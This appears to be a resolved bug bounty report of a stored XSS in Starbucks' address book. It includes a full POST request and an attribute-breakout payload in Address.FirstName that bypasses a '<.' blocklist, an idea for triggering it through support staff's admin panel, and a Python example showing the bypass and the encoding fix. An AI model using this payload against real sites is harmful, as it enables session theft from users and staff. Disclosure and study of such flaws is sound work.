Stored XSS in Address Book (starbucks.com/account/profile)
Low
Starbucks
Reported by
myst404
Vulnerability Details
Technical details and impact analysis
Hello,
I just found a stored XSS in the "Address book" menu of a user's profile: https://www.starbucks.com/account/profile
# Description
The XSS happens because of the lack of filtering on the **Address.FirstName** parameter when you POST a new address to the URL https://www.starbucks.com/account/profile/AddressSave:
{F138388}
{F138390}
Here are the POST parameters to reproduce the issue:
{F138394}
```
Address.AddressName=bbbbb%22%3E&Address.FirstName=z%22 onmouseover="alert('Hackerone')" style="position:fixed;left:0;top:0;width:9999px;height:9999px;">&Address.LastName=bbbbb%22%3E&Address.Country=US&Address.AddressLine1=bbbbb%22%3E&Address.AddressLine2=aaaa%22%3E&Address.City=aaaa%22%3E&Address.CountrySubdivision=AK&Address.PostalCode=75000&Address.PhoneNumber=9901231093&Address.PhoneExtension=&Address.AddressType=Registration&Address.AddressId=32ecef14-f8af-4b5e-adad-d8d2adc8ddad&Address.VerificationStatus=Override&IsAddress=true&__RequestVerificationToken=MDSbXzmn-5j18ck06PpT7Og05zgwOzgq8FMwiqTXIeUfcfRS-keyp9i_x0VbBaIfvUo7EhzYGMvvzPUc0WG5QqlG_YathJ80lgs-p3PCoyNfdvo_E-XY6JfoC9R4tPir0
```
It was quite tricky to leverage.
Indeed:
- It looks like no parameter from this request is filtered. However, except for **Address.FirstName**, they are printed inside an HTML tag, and you prevented the opening of a new tag by blocking anything matching "<." (where the dot can be anything, of course).
- The maximum length of each field (15 characters) is only checked client-side, though short XSS payloads exist anyway.
- That is why my final payload is:
**z" onmouseover="alert('Hackerone')" style="position:fixed;left:0;top:0;width:9999px;height:9999px;">**
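The two weaknesses described above, illustrated as an added Python example (not Starbucks' code): a "<." blocklist does not stop a breakout from a double-quoted attribute, the 15-character limit has to be enforced server-side, and attribute-context encoding of the stored value is what actually neutralises the payload. The payload string is the one quoted in this report; the `<input>` rendering is an assumed stand-in for the real address form.

```python
import html
import re

# Payload quoted in the report: it closes the attribute with a double quote and
# never uses "<", so a tag-opening blocklist lets it through.
REPORT_PAYLOAD = ('z" onmouseover="alert(\'Hackerone\')" '
                  'style="position:fixed;left:0;top:0;width:9999px;height:9999px;">')

MAX_FIELD_LEN = 15  # the limit the report says was only checked client-side


def tag_blocklist_accepts(value: str) -> bool:
    """The filter the report describes: reject '<' followed by any character."""
    return re.search(r"<.", value) is None


def first_name_is_valid(value: str) -> bool:
    """Server-side validation mirroring the client-side length rule."""
    return 0 < len(value) <= MAX_FIELD_LEN


def render_first_name_unsafe(value: str) -> str:
    """Reflects the stored value into an attribute unencoded (the reported behaviour).
    Assumed markup, not the site's real template."""
    return f'<input name="Address.FirstName" value="{value}">'


def render_first_name_safe(value: str) -> str:
    """Attribute-context encoding: quotes, angle brackets and ampersands become entities,
    so the value can never terminate the attribute or the tag."""
    return f'<input name="Address.FirstName" value="{html.escape(value, quote=True)}">'


def attribute_count(markup: str) -> int:
    """Counts attribute openings in the rendered tag; a successful breakout adds extra ones."""
    return len(re.findall(r'\s[\w-]+="', markup))


if __name__ == "__main__":
    print("blocklist accepts payload:", tag_blocklist_accepts(REPORT_PAYLOAD))   # True
    print("passes server-side length check:", first_name_is_valid(REPORT_PAYLOAD))  # False
    print("attributes, unencoded:", attribute_count(render_first_name_unsafe(REPORT_PAYLOAD)))  # 4
    print("attributes, encoded:  ", attribute_count(render_first_name_safe(REPORT_PAYLOAD)))    # 2
```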
Here is the email of my account if you want to check for yourself: *██████*
# Risks
I assume that you perfectly know the risks of an XSS.
This one presents a high/critical risk as my addresses can, I think, be seen in the admin panel. I just have to contact the Customer Support for them to look at my account and trigger the XSS.
# Remediation
I also assume that you know how to correct XSS properly as it looks like it is well done elsewhere on the website.
Best regards,
Report Details
Additional information and metadata
State: Closed
Substate: Resolved
Weakness: Cross-site Scripting (XSS) - Generic